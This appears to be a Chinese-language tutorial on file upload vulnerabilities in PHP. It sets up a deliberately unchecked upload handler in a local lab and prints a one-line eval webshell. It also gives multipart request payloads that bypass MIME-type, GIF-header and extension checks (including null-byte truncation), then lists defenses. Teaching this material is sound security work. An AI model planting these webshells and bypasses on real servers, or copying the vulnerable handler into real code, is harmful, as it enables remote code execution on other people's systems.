1、概述
定义: 文件上传漏洞( Unrestricted File Upload)网站上传功能过滤不严格,导致用户可通过上传文件对系统造成危害。
上传服务端可解析的脚本文件造成远程代码执行、上传超大文件造成拒绝服务、上传Html文件引发XSS等。
分类: Web通用漏洞
风险等级: 严重/中危
危害:上传文件Getshell/上传HTML文件实现XSS攻击、上传超大文件引发拒绝服务等
2、漏洞原理+利用
漏洞示例:
在本地的phpstudy中搭建一个简单的靶场
<html>
<form action="http://127.0.0.1/upload.php"
method="POST" enctype="multipart/form-data">
<input name="a" type="file"></input>
<input name="b" ></input>
<input type="submit"></input>
</form>
</html>
<?php
var_dump($_POST['b']);
var_dump($_FILES);
move_uploaded_file($_FILES["a"]["tmp_name"],"
./upload/" . $_FILES["a"]["name"]);
?>
需要在同目录下创建一个upload文件夹
漏洞利用:
上传一个一句话木马,然后用蚁剑远程连接。
<?php eval($_POST['1'])?>
- 通过上传GetShell。对于服务器直接支持解析的文件格式,只需要上传该后缀的文件即可。这种
情况下的漏洞也被称作任意文件上传。
- 通过上传实现XSS攻击。上传HTML文件时,在其中插入XSS代码实现XSS攻击。
- 通过上传实现服务器拒绝服务。上传超大文件,或当服务器自动执行解压操作时,上传畸形的压
缩包文件实现拒绝服务。
文件上传+环境解析 = WebShell
文件上传+任意路径控制 = 文件覆盖(WebShell)
文件上传 - 环境解析 - 路径控制 = XSS
文件上传-环境解析+无大小限制=拒绝服务
3、漏洞绕过
文件类型限制:
<?php
if($_FILES['a']['type'] != "image/gif")
{
die("Sorry,we only allow uploading GIF images");
}
?>
绕过:
------WebKitFormBoundaryU1lrzLiplUyRrlHJ
Content-Disposition: form-data; name="a"; filename="filename.php"
Content-Type: text/php image/gif
file_content <?php eval($_GET['a'])?>
------WebKitFormBoundaryU1lrzLiplUyRrlHJ
文件头限制:
<?php
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$filename = '1.php';
echo finfo_file($finfo,$filename);
?>
绕过:
添加一个GIF(也就是可以上传到服务器上的文件类型)的文件头就可以。
47494638 39613804 A005F700 00000000 | GIF89a8
0509080A 09050B0C 0B120E0D 0E0F100F |
11101211 0E131313 1A151316 16191719 |
文件后缀追加限制:
<?php
var_dump($_POST['a']);
var_dump($_FILES);
move_uploaded_file($_FILES["a"]["tmp_name"],"./upload" .$_POST['a'].'.jpg');
?>
绕过:
使用%00截断。 要求:PHP版本 < 5.3.4
------WebKitFormBoundaryU1lrzLiplUyRrlHJ
Content-Disposition: form-data; name="a"
1.php0x00
------WebKitFormBoundaryU1lrzLiplUyRrlHJ
条件竞争: 恶意文件上传后被检测到立马被删除,攻击者在他被删除前使用自动化工具快速频繁的请求该文件。
4、漏洞挖掘
一般都在可以上传文件的位置,像上传头像照片等。
5、漏洞防御
1.严格限制上传文件后缀
2.对于无法限制文件后缀的情况,可以严格限制上传目录(防御../跳出目录),
同时将该目录设置为不可解析(octet-stream)。将其他目录设置为不可写入。
3.使用分站存储上传文件,分站不开启脚本资源解析。